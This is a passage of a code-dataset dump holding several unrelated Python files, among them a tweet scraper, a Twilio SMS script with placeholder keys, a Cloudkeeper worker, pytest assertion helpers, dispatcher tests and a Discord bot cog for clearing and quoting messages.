{}...\".format(path))\n if check_file.exists():\n print(\"File exist, write after the last line.\")\n temp_id = re.search(r'/\\*(.*?)\\*(.*?)\\*/', str(find_last_line(path)))\n # print(\"..\", temp_id.group(2))\n if temp_id:\n last_num = int(temp_id.group(1)) + 1\n last_id = temp_id.group(2)\n print(\"Start at number:\", last_num, \"id:\", last_id)\n tweet_number = last_num\n else:\n print(\"Something wrong, check\", path)\n else:\n print(\"File is not exist, create the new file.\")\n\n for search_status in tweepy.Cursor(api2.search, q=search_word,\n # result_type='recent',\n tweet_mode='extended',\n lang='en',\n max_id=str(int(last_id) - 1),\n count=100).pages(10000):\n # print(\"Get tweets successfully ... \\n\\n\")\n # print(search_status)\n \n with open(path, \"a\") as file_text:\n for i in range(0, len(search_status)):\n s_temp_text = search_status[i].full_text.replace(\"\\n\", \"
\")\n if re.match(r'^RT', s_temp_text):\n RT_counter += 1\n else:\n file_text.write(\"/*{2}*{1}*/{0}\\n\".format(\n s_temp_text,\n search_status[i].id,\n tweet_number + 1))\n\n # print(\"/*{2}*{1}*/{0}\".format(\n # s_temp_text,\n # search_status[i].id,\n # tweet_number + 1))\n tweet_number += 1\n time.sleep(2)\n stop_flag += 1\n flag2 = 0\n if stop_flag > 150:\n with open(log_path, \"a\") as f_log:\n flag2 = 1\n f_log.write(\n \"[{}]sleeped ...\\n\".format(\n time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime())))\n time.sleep(60 * 8)\n stop_flag = 0\n if key_num == 0:\n key_num = 1\n elif key_num == 1:\n key_num = 0\n\n if flag2 == 1:\n print(\"if flag2...\")\n with open(log_path, \"a\") as f_log:\n f_log.write(\n \"[{0}]Totally deleted useless tweets {1}\\n\".format(\n time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime()),\n RT_counter))\n break\n # except BaseException:\n # pass\n # print(\"stop at page:\"+)\n # print(\"ERROR! May be the key you inputted is wrong! \\nPlease try again...\")\n # key_flag = 1\n # # api2=api.s_access_token(key_flag)\n # search_tweets(searchword, key_flag)\n\n\nif __name__ == '__main__':\n key_flag = 0 # =1 When the key_list is 4 lines or it is a wrong key.\n print(key_num)\n # search test\n q = \"Donald Trump\"\n # q = \"#皮肉\"\n while True:\n try:\n search_tweets(q, key_flag)\n except Exception as e:\n with open(\"../log.txt\", \"a\") as f_log:\n f_log.write(\n \"[{0}]Error! {1}\\n\".format(\n time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime()), e))\n sys.exit()\n time.sleep(15 * 60)\n sys.exit()\n","sub_path":"tweetsearchintest.py","file_name":"tweetsearchintest.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604389391","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 26 03:34:28 2018\n\n@author: kevinschenthal\n\nRepeated String\n\"\"\"\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the repeatedString function below.\ndef repeatedString(s, n):\n n_as_in_s = len([x for x in s if x == 'a'])\n n_a_whole = int(n / len(s)) * n_as_in_s\n len_remainder = n % len(s)\n num_a_remainder = len([x for x in s[:len_remainder] if x == 'a'])\n return n_a_whole + num_a_remainder\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n n = int(input())\n\n result = repeatedString(s, n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n\n","sub_path":"repeatedString.py","file_name":"repeatedString.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"458218864","text":"from twilio.rest import Client\n\n#these are the MSA keys\naccount_sid = \"A\"\nauth_token = \"B\"\n\nclient = Client(account_sid, auth_token)\n\nmsa_numbers = [\"ABC\"]#insert the list of numbers\n\nfor i in range(len(msa_numbers)):# for loop\n\tmessage = client.messages.create(to=msa_numbers[i], from_=\"+16123248644\",\n body=\"Morning. this is a test message. wake up\")\n","sub_path":"msa_twilio.py","file_name":"msa_twilio.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"550250561","text":"from functools import partial\nimport time\nimport os\nimport threading\nimport cklib.signal\nfrom typing import List, Dict\nfrom cklib.logging import log, add_args as logging_add_args\nfrom cklib.graph import add_args as graph_add_args\nfrom cklib.jwt import add_args as jwt_add_args\nfrom cklib.pluginloader import PluginLoader\nfrom cklib.baseplugin import BaseCollectorPlugin, PluginType\nfrom cklib.web import WebServer\nfrom cklib.web.metrics import WebApp\nfrom cklib.utils import log_stats, increase_limits\nfrom cklib.args import ArgumentParser\nfrom cklib.core.actions import CoreActions\nfrom cklib.core.tasks import CoreTasks\nfrom ckworker.collect import collect, add_args as collect_add_args\nfrom ckworker.cleanup import cleanup, add_args as cleanup_add_args\nfrom ckworker.ckcore import add_args as ckcore_add_args\nfrom ckworker.tag import core_tag_tasks_processor\nfrom cklib.event import (\n add_event_listener,\n Event,\n EventType,\n add_args as event_add_args,\n)\n\n\n# This will be used in main() and shutdown()\nshutdown_event = threading.Event()\ncollect_event = threading.Event()\n\n\ndef main() -> None:\n # Try to run in a new process group and\n # ignore if not possible for whatever reason\n try:\n os.setpgid(0, 0)\n except Exception:\n pass\n\n cklib.signal.parent_pid = os.getpid()\n\n # Add cli args\n # The following double parsing of cli args is done so that when\n # a user specifies e.g. `--collector aws --help` they would\n # no longer be shown cli args for other collectors like gcp.\n collector_arg_parser = ArgumentParser(\n description=\"Cloudkeeper Worker\",\n env_args_prefix=\"CKWORKER_\",\n add_help=False,\n add_machine_help=False,\n )\n PluginLoader.add_args(collector_arg_parser)\n (args, _) = collector_arg_parser.parse_known_args()\n ArgumentParser.args = args\n\n arg_parser = ArgumentParser(\n description=\"Cloudkeeper Worker\",\n env_args_prefix=\"CKWORKER_\",\n )\n jwt_add_args(arg_parser)\n logging_add_args(arg_parser)\n graph_add_args(arg_parser)\n collect_add_args(arg_parser)\n cleanup_add_args(arg_parser)\n ckcore_add_args(arg_parser)\n WebApp.add_args(arg_parser)\n PluginLoader.add_args(arg_parser)\n event_add_args(arg_parser)\n add_args(arg_parser)\n\n # Find cloudkeeper Plugins in the cloudkeeper.plugins module\n plugin_loader = PluginLoader(PluginType.COLLECTOR)\n plugin_loader.add_plugin_args(arg_parser)\n\n # At this point the CLI, all Plugins as well as the WebServer have\n # added their args to the arg parser\n arg_parser.parse_args()\n\n # Handle Ctrl+c and other means of termination/shutdown\n cklib.signal.initializer()\n add_event_listener(EventType.SHUTDOWN, shutdown, blocking=False)\n\n # Try to increase nofile and nproc limits\n increase_limits()\n\n web_server = WebServer(WebApp())\n web_server.daemon = True\n web_server.start()\n\n core_actions = CoreActions(\n identifier=\"workerd-actions\",\n ckcore_uri=ArgumentParser.args.ckcore_uri,\n ckcore_ws_uri=ArgumentParser.args.ckcore_ws_uri,\n actions={\n \"collect\": {\n \"timeout\": ArgumentParser.args.timeout,\n \"wait_for_completion\": True,\n },\n \"cleanup\": {\n \"timeout\": ArgumentParser.args.timeout,\n \"wait_for_completion\": True,\n },\n },\n message_processor=partial(\n core_actions_processor, plugin_loader.plugins(PluginType.COLLECTOR)\n ),\n )\n\n task_queue_filter = {}\n if ArgumentParser.args.collector and len(ArgumentParser.args.collector) > 0:\n task_queue_filter = {\"cloud\": list(ArgumentParser.args.collector)}\n core_tasks = CoreTasks(\n identifier=\"workerd-tasks\",\n ckcore_ws_uri=ArgumentParser.args.ckcore_ws_uri,\n tasks=[\"tag\"],\n task_queue_filter=task_queue_filter,\n message_processor=core_tag_tasks_processor,\n )\n core_actions.start()\n core_tasks.start()\n\n # We wait for the shutdown Event to be set() and then end the program\n # While doing so we print the list of active threads once per 15 minutes\n shutdown_event.wait()\n web_server.shutdown()\n time.sleep(1) # everything gets 1000ms to shutdown gracefully before we force it\n cklib.signal.kill_children(cklib.signal.SIGTERM, ensure_death=True)\n log.info(\"Shutdown complete\")\n os._exit(0)\n\n\ndef core_actions_processor(\n collectors: List[BaseCollectorPlugin], message: Dict\n) -> None:\n if not isinstance(message, dict):\n log.error(f\"Invalid message: {message}\")\n return\n kind = message.get(\"kind\")\n message_type = message.get(\"message_type\")\n data = message.get(\"data\")\n log.debug(f\"Received message of kind {kind}, type {message_type}, data: {data}\")\n if kind == \"action\":\n try:\n if message_type == \"collect\":\n start_time = time.time()\n collect(collectors)\n run_time = int(time.time() - start_time)\n log.debug(f\"Collect ran for {run_time} seconds\")\n elif message_type == \"cleanup\":\n start_time = time.time()\n cleanup()\n run_time = int(time.time() - start_time)\n log.debug(f\"Cleanup ran for {run_time} seconds\")\n else:\n raise ValueError(f\"Unknown message type {message_type}\")\n except Exception as e:\n log.exception(f\"Failed to {message_type}: {e}\")\n reply_kind = \"action_error\"\n else:\n reply_kind = \"action_done\"\n\n reply_message = {\n \"kind\": reply_kind,\n \"message_type\": message_type,\n \"data\": data,\n }\n return reply_message\n\n\ndef add_args(arg_parser: ArgumentParser) -> None:\n arg_parser.add_argument(\n \"--timeout\",\n help=\"Collection/cleanup Timeout in seconds (default: 10800)\",\n default=10800,\n dest=\"timeout\",\n type=int,\n )\n arg_parser.add_argument(\n \"--web-port\",\n help=\"Web Port (default 9955)\",\n default=9956,\n dest=\"web_port\",\n type=int,\n )\n arg_parser.add_argument(\n \"--web-host\",\n help=\"IP to bind to (default: ::)\",\n default=\"::\",\n dest=\"web_host\",\n type=str,\n )\n\n\ndef shutdown(event: Event) -> None:\n reason = event.data.get(\"reason\")\n emergency = event.data.get(\"emergency\")\n\n if emergency:\n cklib.signal.emergency_shutdown(reason)\n\n current_pid = os.getpid()\n if current_pid != cklib.signal.parent_pid:\n return\n\n if reason is None:\n reason = \"unknown reason\"\n log.info(\n (\n f\"Received shut down event {event.event_type}:\"\n f\" {reason} - killing all threads and child processes\"\n )\n )\n shutdown_event.set() # and then end the program\n\n\ndef force_shutdown(delay: int = 10) -> None:\n time.sleep(delay)\n log_stats()\n log.error(\n (\n \"Some child process or thread timed out during shutdown\"\n \" - forcing shutdown completion\"\n )\n )\n os._exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ckworker/ckworker/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"262191643","text":"\"\"\"\nCopyright 2016 Oliver Schoenborn. BSD 3-Clause license (see __license__ at bottom of this file for details).\n\nThis module is part of the nose2pytest distribution.\n\nThis module's assert_ functions provide drop-in replacements for nose.tools.assert_ functions (many of which are\npep-8-ized extractions from Python's unittest.case.TestCase methods). As such, it can be imported in a test\nsuite run by py.test, to replace the nose imports with functions that rely on py.test's assertion\nintrospection for error reporting. When combined with running nose2pytest.py on your test suite, this\nmodule may be sufficient to decrease your test suite's third-party dependencies by 1.\n\"\"\"\n\nimport unittest\n\n\n__all__ = [\n 'assert_almost_equal',\n 'assert_not_almost_equal',\n 'assert_dict_contains_subset',\n\n 'assert_raises_regex',\n 'assert_raises_regexp',\n 'assert_regexp_matches',\n 'assert_warns_regex',\n]\n\n\ndef assert_almost_equal(a, b, places=7, msg=None):\n \"\"\"\n Fail if the two objects are unequal as determined by their\n difference rounded to the given number of decimal places\n and comparing to zero.\n\n Note that decimal places (from zero) are usually not the same\n as significant digits (measured from the most signficant digit).\n\n See the builtin round() function for places parameter.\n \"\"\"\n if msg is None:\n assert round(abs(b - a), places) == 0\n else:\n assert round(abs(b - a), places) == 0, msg\n\n\ndef assert_not_almost_equal(a, b, places=7, msg=None):\n \"\"\"\n Fail if the two objects are equal as determined by their\n difference rounded to the given number of decimal places\n and comparing to zero.\n\n Note that decimal places (from zero) are usually not the same\n as significant digits (measured from the most signficant digit).\n\n See the builtin round() function for places parameter.\n \"\"\"\n if msg is None:\n assert round(abs(b - a), places) != 0\n else:\n assert round(abs(b - a), places) != 0, msg\n\n\ndef assert_dict_contains_subset(subset, dictionary, msg=None):\n \"\"\"\n Checks whether dictionary is a superset of subset. If not, the assertion message will have useful details,\n unless msg is given, then msg is output.\n \"\"\"\n dictionary = dictionary\n missing_keys = sorted(list(set(subset.keys()) - set(dictionary.keys())))\n mismatch_vals = {k: (subset[k], dictionary[k]) for k in subset if k in dictionary and subset[k] != dictionary[k]}\n if msg is None:\n assert missing_keys == [], 'Missing keys = {}'.format(missing_keys)\n assert mismatch_vals == {}, 'Mismatched values (s, d) = {}'.format(mismatch_vals)\n else:\n assert missing_keys == [], msg\n assert mismatch_vals == {}, msg\n\n\n# make other unittest.TestCase methods available as-is as functions; trick taken from Nose\n\nclass _Dummy(unittest.TestCase):\n def do_nothing(self):\n pass\n\n_t = _Dummy('do_nothing')\n\nassert_raises_regex=_t.assertRaisesRegex,\nassert_raises_regexp=_t.assertRaisesRegexp,\nassert_regexp_matches=_t.assertRegexpMatches,\nassert_warns_regex=_t.assertWarnsRegex,\n\ndel _Dummy\ndel _t\n\n\n# py.test integration: add all assert_ function to the pytest package namespace\n\n# Use similar trick as Nose to bring in bound methods from unittest.TestCase as free functions:\n\ndef pytest_namespace() -> {str: callable}:\n namespace = {}\n for name, obj in globals().items():\n if name.startswith('assert_'):\n namespace[name] = obj\n\n return namespace\n\n\n# licensing\n\n__license__ = \"\"\"\n Copyright (c) 2016, Oliver Schoenborn\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n * Neither the name of nose2pytest nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n","sub_path":"plugins/assert_tools.py","file_name":"assert_tools.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"304074227","text":"from saqws import SAQSubClient\nfrom clienthandler import ClientHandler\nimport aiohttp\nimport aiohttp.web\nimport asyncio\nimport logging\nimport os\nimport platform\n\n\nlogger = logging.getLogger(__name__)\n# SERVER_HOST = 'localhost'\n# SERVER_PORT = 9876\nSERVER_HOST = 'saqtestbe.appspot.com'\nSERVER_PORT = None\nvalue = None\n\n\nasync def app_entrypoint():\n global data\n\n app = aiohttp.web.Application()\n app.router.add_get(\"/\", root_handler)\n\n # handle websocket clients\n ClientHandler.add_route(app, '/ws')\n\n # setup listener\n queue = asyncio.Queue()\n sub_client = SAQSubClient(data_buffer=queue, formatter=lambda x: x)\n sub_client.connect(scheme='http', host=SERVER_HOST, port=SERVER_PORT, path='/saqws')\n\n loop = asyncio.get_event_loop()\n loop.create_task(broker_distributing(queue))\n return app\n\n\nasync def root_handler(request):\n info = {\n \"file\": __file__,\n \"os\": os.name,\n \"python-version\": platform.python_version()\n }\n return aiohttp.web.json_response(info)\n\n\nasync def broker_distributing(queue: asyncio.Queue):\n global value\n\n while True:\n value = await queue.get()\n ClientHandler.update_value(value)\n\n\nasync def main(host, port):\n app = await app_entrypoint()\n runner = aiohttp.web.AppRunner(app)\n await runner.setup()\n site = aiohttp.web.TCPSite(runner=runner, host=host, port=port, ssl_context=None)\n await site.start()\n\n while True:\n await asyncio.sleep(1)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n\n host = 'localhost'\n port = 9877\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(host, port))","sub_path":"sessionawarequeue/broker/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"347572430","text":"# frase = 'CURSO EM VIDEO PYTHON'.split()\n# frase = ''.join(frase)\n# print(frase[len(frase)::-1]) # frase ao contrario\n# n = int(input('Digite um número para saber seu fatorial: '))\n# cont = n\n# fac = 1\n# while cont > 0:\n# print(cont, end=' ')\n# print('x ' if cont > 1 else '= ', end='')\n# fac = fac * 5\n# cont -= 1\n# print(f'{fac}')\n# n = int(input('Digite um número: '))\n# f = 1\n# for c in range(n, 0, -1):\n# f *= c\n# print(f'{c}', end='')\n# print(' x ' if c > 1 else ' = ', end='')\n# print(f'{f}', end='')\n\n# n = int(input('Quantos termos quer mostrar? '))\n# t1 = 0\n# t2 = 1\n# cont = 3\n# print('0 → 1', end='')\n# while cont <= n:\n# t3 = t2 + t1\n# print(f' → {t3}', end='')\n# cont += 1\n# t1 = t2\n# t2 = t3\n# print('FIM', end='')\n\ntot_idade = man = woman = idade_woman = idade = 0\nsexo = ' '\nprint('#' * 40)\nprint(f'{\"CADASTRO DE PESSOAS\":^40}')\nprint('#' * 40)\nwhile True:\n idade_str = str(input('Digite sua idade: '))\n while idade_str.isnumeric() is not True:\n idade_str = str(input('Dados inválidos, tente novamente: Digite sua idade: '))\n idade = int(idade_str)\n sexo_t = ' '\n while sexo_t.isalpha() is not True:\n sexo_t = str(input('Sexo [M/F]: ')).upper()\n while sexo_t != 'M' and sexo_t != 'F':\n sexo_t = str(input('Dados Incorretos, tente de novo: Sexo [M/F]: ')).upper()\n sexo = str(sexo_t).upper()\n if sexo == 'M':\n man += 1\n elif sexo == 'F':\n woman += 1\n if idade < 20:\n idade_woman += 1\n if idade >= 18:\n tot_idade += 1\n print('-' * 40)\n stop = ' '\n while stop.isalpha() is not True:\n stop = str(input('Quer continuar? [S/N]: ')).upper()\n while stop != 'S' and stop != 'N':\n stop = str(input('Erro na digitação, tente novamente: Quer continuar? [S/N]: ')).upper()\n print('-' * 40)\n if stop == 'S':\n print('=' * 40)\n print('CADASTRE UMA NOVA PESSOA!')\n print('=' * 40)\n elif stop == 'N':\n break\nprint('=' * 40)\nprint('Cadastro Finalizado Com Sucesso!')\nprint('=' * 40)\nprint(f'Todal de pessoas com mais de 18 anos = {tot_idade}')\nprint(f'Homens cadastrados = {man}')\nprint(f'Mulheres cadastradas = {woman}')\nprint(f'Mulheres com menos de 20 anos = {idade_woman}')\n","sub_path":"testtee.py","file_name":"testtee.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"110988003","text":"\"\"\"\nTests for the dispatcher code\n\"\"\"\nfrom .dispatcher import Dispatcher\nfrom .protocol import ConnectionLost\nfrom nose.tools import assert_equals\n\nclass DoubleWorker(object):\n \"\"\"\n This object implements the worker interface, but just concatenates the task\n with itself\n \"\"\"\n def __init__(self):\n self.calls = 0\n\n def do_task(self, configuration_id, task):\n \"\"\"\n Do a silly implementation of a task\n \"\"\"\n self.calls += 1\n return task + task\n\nclass GiveUpWorker(object):\n \"\"\"\n Implements the Worker interface by giving up every time\n \"\"\"\n\n def do_task(self, configuration_id, task):\n \"\"\"\n This raises ConnectionLost which indicates that the worker cannot \n perform tasks for some reason\n \"\"\"\n raise ConnectionLost()\n\ndef test_dispatcher():\n \"\"\"\n Make sure that the tasks do get done\n \"\"\"\n dispatcher = Dispatcher()\n dispatcher.add_worker(DoubleWorker(), 1)\n event = dispatcher.do_task(None, 'yellow')\n assert_equals( 'yellowyellow', event.wait() )\n\ndef test_dispatcher_early():\n \"\"\"\n Make sure that requesting a task before adding a worker is ok\n \"\"\"\n dispatcher = Dispatcher()\n event = dispatcher.do_task(None, 'yellow')\n dispatcher.add_worker(DoubleWorker(), 1)\n assert_equals( 'yellowyellow', event.wait() )\n\ndef test_two_workers():\n \"\"\"\n Ensure that a worker requesting double tasks gets them\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 2)\n dispatcher.add_worker(DoubleWorker(), 2)\n for x in range(2):\n dispatcher.do_task(None, '').wait()\n\n assert_equals( worker.calls, 2)\n\n\ndef test_repeat_workers():\n \"\"\"\n Make sure that workers are recycled once they are finished\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 1)\n for x in range(10):\n dispatcher.do_task(None, '').wait()\n\ndef test_disabled_workers():\n \"\"\"\n Make sure that workers who refused to work don't stop us\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 1)\n dispatcher.add_worker(GiveUpWorker(), 1)\n for x in range(10):\n assert_equals('', dispatcher.do_task(None, '').wait() )\n\ndef test_disabled_workers_multiple():\n \"\"\"\n Make sure a double active worker who refuses to work doesn't cause a problem\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 1)\n dispatcher.add_worker(GiveUpWorker(), 2)\n tasks = [dispatcher.do_task(None, '') for x in range(10)]\n for task in tasks:\n assert_equals('', task.wait() )\n","sub_path":"pymultinode/test_dispatcher.py","file_name":"test_dispatcher.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34464271","text":"import pika\n\nfrom innovapos.worker.app_worker import worker\nfrom innovapos.worker.clients import BlockingAMQPClient\nfrom innovapos.worker.worker import WorkerStates\n\n\n@worker.ws_message_handler(\"debug.states.get\", [WorkerStates.ANY])\ndef states_change(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Devuelve el estado actual \n \"\"\"\n client.send_message(f\"Current state is {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.states.change\", [WorkerStates.ANY])\ndef states_change(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Actualiza el estado actual al estado proporcionado en el body\n \"\"\"\n message = message.upper()\n if message not in WorkerStates.__dict__:\n client.send_message(\"Not a valid enum\")\n return\n old_state = worker.current_state\n worker.current_state = WorkerStates[message]\n client.send_message(f\"State changed from {old_state} to {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.states.simple_any\", [WorkerStates.ANY])\ndef states_any(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Llamada de prueba para ANY\n \"\"\"\n client.send_message(f\"You called DEBUG.STATES.SIMPLE_ANY. Current state is {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.states.debugging_pass\", [WorkerStates.DEBUGGING])\ndef states_fail(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Llamada con filtrado de prueba\n \"\"\"\n client.send_message(f\"Current state is {worker.current_state}\")\n\n\n# @worker.ws_message_handler(\"debug.states.valid_state_definition\") -> falla. valid_states no esta definido\n# @worker.ws_message_handler(\"debug.states.valid_state_definition\", []) -> falla, valid_states esta vacio\n@worker.ws_message_handler(\"debug.states.valid_state_definition\", [WorkerStates.NONE])\ndef states_fail(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Ejemplo de definicion correcta de handler de mensajes\n \"\"\"\n # unreachable code, no state defined\n client.send_message(f\"Current state is {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.multihandler_ping\", [WorkerStates.ANY])\n@worker.gateway_message_handler(\"debug.multihandler_ping\", [WorkerStates.ANY])\n@worker.app_message_handler(\"debug.multihandler_ping\", [WorkerStates.ANY])\ndef multihandler_ping(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Ejemplo de definicion correcta de handler de mensajes\n \"\"\"\n # unreachable code, no state defined\n client.send_message(\"PONG\")\n","sub_path":"src/innovapos/worker/tasks/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"193801168","text":"import random\r\n\r\nlen_scale_pattern = int(input(\"length of scale pattern\"))\r\nnumber_of_octaves = int(input(\"number of octaves\")) \r\ntotal_number_of_notes = len_scale_pattern * number_of_octaves\r\n\r\ndef get_all_factors(n):\r\n factors = []\r\n for i in range(2,n+1):\r\n if n%i == 0:\r\n factors.append(i)\r\n return factors\r\n\r\nlist_of_factors = get_all_factors(total_number_of_notes)\r\nnumber_of_notes_in_rhythm = random.choice(list_of_factors)\r\n\r\nbeats_in_measure = random.choice([3, 4, 5]) # this may be expanded\r\nsubdivision = random.choice([3, 4, 5]) # this may be expanded\r\nsubdivisions_available = subdivision * beats_in_measure \r\n\r\nn = number_of_notes_in_rhythm\r\nrhythm_pattern = []\r\n\r\nwhile n > 0:\r\n rhythm = random.randint(1, subdivisions_available-n)\r\n rhythm_pattern.append(rhythm)\r\n subdivisions_available = subdivisions_available - rhythm\r\n n = n - 1\r\nrhythm = subdivisions_available\r\nrhythm_pattern.append(rhythm)\r\n \r\nprint (rhythm_pattern)\r\n\r\n","sub_path":"rhythm.py","file_name":"rhythm.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"279091548","text":"import discord\r\nfrom discord.ext import commands\r\nimport modules.Functions as bot\r\n\r\nlocalesign = 'RU'\r\n\r\n# Getting locale text for replies\r\nDBtext = bot.load_locale('ChatCommands')\r\n\r\nclass ChatCommands:\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n # --------------- Command for clearing chat ---------------\r\n\r\n @commands.command(pass_context=True, aliases=['clr'])\r\n async def clear(self, ctx, amount='1'):\r\n if ctx.message.channel.is_private is True:\r\n return\r\n try:\r\n int(amount)\r\n except ValueError:\r\n await self.client.delete_message(ctx.message)\r\n msg = await self.client.say(DBtext[1])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n amount = int(amount)\r\n if ctx.message.author.server_permissions.manage_messages is True:\r\n if 0 < amount < 100:\r\n channel = ctx.message.channel\r\n messages = []\r\n async for message in self.client.logs_from(channel, limit=amount+1):\r\n messages.append(message)\r\n try:\r\n await self.client.delete_messages(messages)\r\n except Exception as error:\r\n msg = await self.client.say(DBtext[2] + ' ' + str(error))\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n msg = await self.client.say(DBtext[3].format(len(messages)-1))\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n else:\r\n await self.client.delete_message(ctx.message)\r\n msg = await self.client.say(DBtext[4])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n else:\r\n msg = await self.client.say(DBtext[5])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n\r\n # --------------- Command for quoting messages ---------------\r\n\r\n @commands.command(pass_context=True, aliases=['qt','move','mv'])\r\n async def quote(self, ctx):\r\n if ctx.message.channel.is_private is True:\r\n return\r\n await self.client.delete_message(ctx.message)\r\n\r\n try:\r\n chnlID, msgID = ctx.message.content.split()[1:] # Getting channel and message ID of source message\r\n except Exception:\r\n msg = await self.client.say(DBtext[6])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n chnlID = bot.clear_channel_ID(chnlID) # Clearing channel ID from mention\r\n chnl_from = self.client.get_channel(chnlID)\r\n if chnl_from is None:\r\n msg = await self.client.say(DBtext[7])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n try:\r\n msg = await self.client.get_message(chnl_from, msgID)\r\n except discord.NotFound:\r\n msg = await self.client.say(DBtext[8])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n mvembed = discord.Embed(\r\n description = msg.content,\r\n timestamp = msg.timestamp,\r\n color = discord.Color.blue()\r\n )\r\n mvembed.set_footer(text='#'+chnl_from.name)\r\n mvembed.set_author(name=msg.author.name, icon_url=msg.author.avatar_url)\r\n # Getting attachment url if exist\r\n if msg.attachments != []:\r\n attch = msg.attachments.pop().get('url')\r\n mvembed.set_image(url=attch)\r\n\r\n await self.client.say(embed=mvembed)\r\n\r\n # --------------- Event for making embedded messages ---------------\r\n\r\n async def on_message(self, message):\r\n if (message.author == self.client.user) or (message.channel.is_private is True):\r\n return\r\n\r\n if message.content.startswith('>>'):\r\n await self.client.delete_message(message)\r\n if message.author.color == discord.Color(0x000000):\r\n clr = discord.Color.light_grey()\r\n else:\r\n clr = message.author.color\r\n embed = await bot.newembed(self.client, user_id=message.author.id, content=message.content[2:], color=clr)\r\n await self.client.send_message(message.channel, embed=embed)\r\n\r\ndef setup(client):\r\n 